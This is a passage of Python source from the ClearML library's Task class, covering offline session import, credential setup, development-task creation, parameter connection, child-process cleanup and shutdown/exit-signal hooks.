:param session_folder_zip: Path to a folder containing the session, or zip-file of the session folder.
:return: Newly created task ID (str)
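Example (a minimal sketch; the zip path is a placeholder for a previously stored offline session):
.. code-block:: py
    new_task_id = Task.import_offline_session('/path/to/offline_session.zip')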
"""
print('ClearML: Importing offline session from {}'.format(session_folder_zip))
temp_folder = None
if Path(session_folder_zip).is_file():
# unzip the file:
temp_folder = mkdtemp(prefix='clearml-offline-')
ZipFile(session_folder_zip).extractall(path=temp_folder)
session_folder_zip = temp_folder
session_folder = Path(session_folder_zip)
if not session_folder.is_dir():
raise ValueError("Could not find the session folder / zip-file {}".format(session_folder))
try:
with open((session_folder / cls._offline_filename).as_posix(), 'rt') as f:
export_data = json.load(f)
except Exception as ex:
raise ValueError(
"Could not read Task object {}: Exception {}".format(session_folder / cls._offline_filename, ex))
task = cls.import_task(export_data)
task.mark_started(force=True)
# fix artifacts
if task.data.execution.artifacts:
from . import StorageManager
# noinspection PyProtectedMember
offline_folder = os.path.join(export_data.get('offline_folder', ''), 'data/')
# noinspection PyProtectedMember
remote_url = task._get_default_report_storage_uri()
if remote_url and remote_url.endswith('/'):
remote_url = remote_url[:-1]
for artifact in task.data.execution.artifacts:
local_path = artifact.uri.replace(offline_folder, '', 1)
local_file = session_folder / 'data' / local_path
if local_file.is_file():
remote_path = local_path.replace(
'.{}{}'.format(export_data['id'], os.sep), '.{}{}'.format(task.id, os.sep), 1)
artifact.uri = '{}/{}'.format(remote_url, remote_path)
StorageManager.upload_file(local_file=local_file.as_posix(), remote_url=artifact.uri)
# noinspection PyProtectedMember
task._edit(execution=task.data.execution)
# logs
TaskHandler.report_offline_session(task, session_folder)
# metrics
Metrics.report_offline_session(task, session_folder)
# print imported results page
print('ClearML results page: {}'.format(task.get_output_log_web_page()))
task.mark_completed()
# close task
task.close()
# cleanup
if temp_folder:
# noinspection PyBroadException
try:
shutil.rmtree(temp_folder)
except Exception:
pass
return task.id
@classmethod
def set_credentials(
cls,
api_host=None,
web_host=None,
files_host=None,
key=None,
secret=None,
store_conf_file=False
):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], bool) -> None
"""
Set new default **ClearML Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the ClearML configuration
file, ``clearml.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(
api_host='http://localhost:8008', web_host='http://localhost:8080', files_host='http://localhost:8081',
key='optional_credentials', secret='optional_credentials'
)
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param bool store_conf_file: If True store the current configuration into the ~/clearml.conf file.
If the configuration file exists, no change will be made (outputs a warning).
Not applicable when running remotely (i.e. clearml-agent).
"""
if api_host:
Session.default_host = api_host
if not running_remotely() and not ENV_HOST.get():
ENV_HOST.set(api_host)
if web_host:
Session.default_web = web_host
if not running_remotely() and not ENV_WEB_HOST.get():
ENV_WEB_HOST.set(web_host)
if files_host:
Session.default_files = files_host
if not running_remotely() and not ENV_FILES_HOST.get():
ENV_FILES_HOST.set(files_host)
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if store_conf_file and not running_remotely():
active_conf_file = get_active_config_file()
if active_conf_file:
getLogger().warning(
'Could not store credentials in configuration file, '
'\'{}\' already exists'.format(active_conf_file))
else:
conf = {'api': dict(
api_server=Session.default_host,
web_server=Session.default_web,
files_server=Session.default_files,
credentials=dict(access_key=Session.default_key, secret_key=Session.default_secret))}
with open(get_config_file(), 'wt') as f:
lines = json.dumps(conf, indent=4).split('\n')
f.write('\n'.join(lines[1:-1]))
@classmethod
def debug_simulate_remote_task(cls, task_id, reset_task=False):
# type: (str, bool) -> ()
"""
Simulate remote execution of a specified Task.
This call simulates the behaviour of your Task as if executed by the ClearML-Agent.
This means configurations will come from the backend server into the code
(the opposite of manual execution, where the backend logs the code arguments).
Use with care.
:param task_id: Task ID to simulate. Notice that all configuration will be taken from the specified
Task, regardless of the initial values in the code, just as if executed by a ClearML agent.
:param reset_task: If True, the target Task is automatically cleared / reset.
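Example (a minimal sketch; the task id is a placeholder for an existing Task whose configuration will be used):
.. code-block:: py
    Task.debug_simulate_remote_task(task_id='aabbcc', reset_task=True)
    task = Task.init(project_name='examples', task_name='debug remote')  # configuration comes from task 'aabbcc'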
"""
# if we are already running remotely, do nothing
if running_remotely():
return
# verify Task ID exists
task = Task.get_task(task_id=task_id)
if not task:
raise ValueError("Task ID '{}' could not be found".format(task_id))
if reset_task:
task.reset(set_started_on_success=False, force=True)
from .config.remote import override_current_task_id
from .config.defs import LOG_TO_BACKEND_ENV_VAR
override_current_task_id(task_id)
LOG_TO_BACKEND_ENV_VAR.set(True)
DEBUG_SIMULATE_REMOTE_TASK.set(True)
@classmethod
def _create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], Task.TaskTypes) -> Task
"""
Create a new unpopulated Task (experiment).
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
:return: The newly created Task.
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _has_current_task_obj(cls):
# type: () -> bool
return bool(cls.__main_task)
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type, tags,
reuse_last_task_id, continue_last_task=False, detect_repo=True, auto_connect_streams=True
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# conform reuse_last_task_id and continue_last_task
if continue_last_task and isinstance(continue_last_task, str):
reuse_last_task_id = continue_last_task
continue_last_task = True
elif isinstance(continue_last_task, int) and continue_last_task is not True:
# allow initial offset environment override
continue_last_task = continue_last_task
if TASK_SET_ITERATION_OFFSET.get() is not None:
continue_last_task = TASK_SET_ITERATION_OFFSET.get()
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id or isinstance(reuse_last_task_id, str):
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
# instead of resetting the previously used task we are continuing the training with it.
if task and \
(continue_last_task or
(isinstance(continue_last_task, int) and not isinstance(continue_last_task, bool))):
task.reload()
task.mark_started(force=True)
# continue from the last reported iteration, or from an explicit iteration offset
if continue_last_task is True:
task.set_initial_iteration(task.get_last_iteration() + 1)
else:
task.set_initial_iteration(continue_last_task)
else:
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (
str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_models_id or (cls.archived_tag in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark us as the main Task, there should only be one dev Task at a time.
if not Task.__main_task:
Task.__main_task = task
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# add Task tags
if tags:
task.add_tags([tags] if isinstance(tags, str) else tags)
# force update of base logger to this current task (this is the main logger task)
logger = task._get_logger(auto_connect_streams=auto_connect_streams)
if closed_old_task:
logger.report_text('ClearML Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id and not continue_last_task:
logger.report_text('ClearML Task: overwriting (reusing) task id=%s' % task.id)
elif default_task_id and continue_last_task:
logger.report_text('ClearML Task: continuing previous task id=%s '
'Notice this run will not be reproducible!' % task.id)
else:
logger.report_text('ClearML Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack) - 1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i - 1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet, auto_connect_streams=False):
# type: (Optional[float], Union[bool, dict]) -> Logger
"""
Get a logger object for reporting, based on the task.
:param flush_period: The period of the logger flush.
If None or any other False value, the logger will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called and self._at_exit_called in (True, get_current_thread_id(),):
raise ValueError("Cannot use Task Logger after task was closed")
# Get a logger object
self._logger = Logger(
private_task=self,
connect_stdout=(auto_connect_streams is True) or
(isinstance(auto_connect_streams, dict) and auto_connect_streams.get('stdout', False)),
connect_stderr=(auto_connect_streams is True) or
(isinstance(auto_connect_streams, dict) and auto_connect_streams.get('stderr', False)),
connect_logging=isinstance(auto_connect_streams, dict) and auto_connect_streams.get('logging', False),
)
# make sure we set our reporter to async mode
# we make sure we flush it in self._at_exit
self._reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model, name=None):
assert isinstance(model, OutputModel)
model.connect(self, name=name)
return model
def _save_output_model(self, model):
"""
Deprecated: Save a reference to the connected output model.
:param model: The connected output model
"""
# deprecated
self._connected_output_model = model
def _reconnect_output_model(self):
"""
Deprecated: If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, and then we will have to get the model design from the
input model by reconnecting.
"""
# Deprecated:
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model, name=None):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
model.connect(self, name)
return model
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None, name=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython # noqa
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
# if we have a parser but no parsed_args, we need to find the matching parsed_args
if parser and not parsed_args:
for _parser, _parsed_args in get_argparser_last_args():
if _parser == parser:
parsed_args = _parsed_args
break
else:
# prefer the first argparser (hopefully it is the most relevant one)
for _parser, _parsed_args in get_argparser_last_args():
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary, name=None):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict), prefix=name)
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict), prefix=name)
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
self._arguments.copy_from_dict(flatten_dictionary(dictionary), prefix=name)
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict, prefix=name)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class, name=None):
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
parameters = self.get_parameters()
if not name:
attr_class.update_from_dict(parameters)
else:
attr_class.update_from_dict(
dict((k[len(name) + 1:], v) for k, v in parameters.items() if k.startswith('{}/'.format(name))))
else:
self.set_parameters(attr_class.to_dict(), __parameters_prefix=name)
return attr_class
def _connect_object(self, an_object, name=None):
def verify_type(key, value):
if str(key).startswith('_') or not isinstance(value, self._parameters_allowed_types):
return False
# verify everything is json able (i.e. basic types)
try:
json.dumps(value)
return True
except TypeError:
return False
a_dict = {k: v for k, v in an_object.__dict__.items() if verify_type(k, v)}
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
a_dict = self._connect_dictionary(a_dict, name)
for k, v in a_dict.items():
if getattr(an_object, k, None) != a_dict[k]:
setattr(an_object, k, v)
return an_object
else:
self._connect_dictionary(a_dict, name)
return an_object
def _dev_mode_stop_task(self, stop_reason, pid=None):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped(status_reason='USER ABORTED')
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False, pid=pid, allow_kill_calling_pid=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True, pid=pid, allow_kill_calling_pid=True)
os._exit(1) # noqa
@staticmethod
def _kill_all_child_processes(send_kill=False, pid=None, allow_kill_calling_pid=True):
# get current process if pid not provided
current_pid = os.getpid()
kill_ourselves = None
pid = pid or current_pid
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
# kill ourselves last (if we need to)
if child.pid == current_pid:
kill_ourselves = child
continue
if send_kill:
child.kill()
else:
child.terminate()
# handle the parent process itself (which may be the calling process)
if allow_kill_calling_pid or parent.pid != current_pid:
if send_kill:
parent.kill()
else:
parent.terminate()
# kill ourselves if we need to:
if allow_kill_calling_pid and kill_ourselves:
if send_kill:
kill_ourselves.kill()
else:
kill_ourselves.terminate()
def _dev_mode_setup_worker(self):
if (running_remotely() and not DEBUG_SIMULATE_REMOTE_TASK.get()) \
or not self.is_main_task() or self._at_exit_called or self._offline_mode:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for the repository detection thread to finish
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called and self._at_exit_called != get_current_thread_id():
return
# make sure we do not try to use events, because Python might deadlock itself.
# https://bugs.python.org/issue41606
if self.__is_subprocess():
BackgroundMonitor.set_at_exit_state(True)
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
# fix debugger signal in the middle, catch everything
try:
self.__shutdown()
except: # noqa
pass
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
is_sub_process = self.__is_subprocess()
# if we are called twice (signal in the middle of the shutdown),
_nested_shutdown_call = bool(self._at_exit_called == get_current_thread_id())
if _nested_shutdown_call and not is_sub_process:
# if we were called again in the main thread on the main process, let's try again
# make sure we only do this once
self._at_exit_called = True
else:
# make sure we flush stdout, this is the best we can do.
if _nested_shutdown_call and self._logger and is_sub_process:
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=True)
self._at_exit_called = True
# if we get here, we should do nothing and leave
return
else:
# from here only a single thread can re-enter
self._at_exit_called = get_current_thread_id()
# disable lock on signal callbacks, to avoid deadlocks.
if self.__exit_hook and self.__exit_hook.signal is not None:
self.__edit_lock = False
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if (not running_remotely() or DEBUG_SIMULATE_REMOTE_TASK.get()) \
and self.is_main_task() and not is_sub_process:
# check if we crashed, or the signal is not an interrupt (manual break)
task_status = ('stopped',)
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
# check if this is Jupyter interactive session, do not mark as exception
if 'IPython' in sys.modules:
is_exception = None
# only if we have an exception (and not ctrl-break) or signal is not SIGTERM / SIGINT
if (is_exception and not isinstance(is_exception, KeyboardInterrupt)
and is_exception != KeyboardInterrupt) \
or (not self.__exit_hook.remote_user_aborted and
self.__exit_hook.signal not in (None, 2, 15)):
task_status = (
'failed',
'Exception {}'.format(is_exception) if is_exception else
'Signal {}'.format(self.__exit_hook.signal))
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed',)
else:
task_status = ('stopped',)
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
if not is_sub_process:
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self.__reporter and self.__reporter.events_waiting())):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flushes everything
if self.__reporter:
self.__reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
# elif self._logger:
# # noinspection PyProtectedMember
# self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.mark_completed()
elif task_status[0] == 'stopped':
self.stopped()
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
Task.__update_master_pid_task(task=None)
except Exception:
# make sure we do not interrupt the exit process
pass
# make sure we store last task state
if self._offline_mode and not is_sub_process:
# noinspection PyBroadException
try:
# create zip file
offline_folder = self.get_offline_mode_folder()
zip_file = offline_folder.as_posix() + '.zip'
with ZipFile(zip_file, 'w', allowZip64=True, compression=ZIP_DEFLATED) as zf:
for filename in offline_folder.rglob('*'):
if filename.is_file():
relative_file_name = filename.relative_to(offline_folder).as_posix()
zf.write(filename.as_posix(), arcname=relative_file_name)
print('ClearML Task: Offline session stored in {}'.format(zip_file))
except Exception:
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
# make sure no one will re-enter the shutdown method
self._at_exit_called = True
if not is_sub_process and BackgroundMonitor.is_subprocess_enabled():
BackgroundMonitor.wait_for_sub_process(self)
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# unregister the exception and signal hooks
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
self.signal = sig
org_handler = self._org_handlers.get(sig)
signal.signal(sig, org_handler or signal.SIG_DFL)
# if this is a sig term, we wait until __at_exit is called (basically do nothing)
if sig == signal.SIGINT:
# return original handler result
return org_handler if not callable(org_handler) else org_handler(sig, frame)
if self._signal_recursion_protection_flag:
# call original
os.kill(os.getpid(), sig)
return org_handler if not callable(org_handler) else org_handler(sig, frame)
self._signal_recursion_protection_flag = True
# call exit callback
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
# noinspection PyUnresolvedReferences
os.kill(os.getpid(), sig)
self._signal_recursion_protection_flag = False
# return handler result
return org_handler if not callable(org_handler) else org_handler(sig, frame)
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
def _remove_at_exit_callbacks(self):
self.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
atexit.unregister(self.__exit_hook._exit_callback)
self._at_exit_called = True
@classmethod
def __get_task(
cls,
task_id=None, # type: Optional[str]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
include_archived=True, # type: bool
tags=None, # type: Optional[Sequence[str]]
task_filter=None # type: Optional[dict]
):
# type: (...) -> Task
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
# get default session, before trying to access tasks.Task so that we do not create two sessions.
session = cls._get_default_session()
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
task_filter = task_filter or {}
if not include_archived:
task_filter['system_tags'] = (task_filter.get('system_tags') or []) + ['-{}'.format(cls.archived_tag)]
if tags:
task_filter['tags'] = (task_filter.get('tags') or []) + list(tags)
res = cls._send(
session,
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
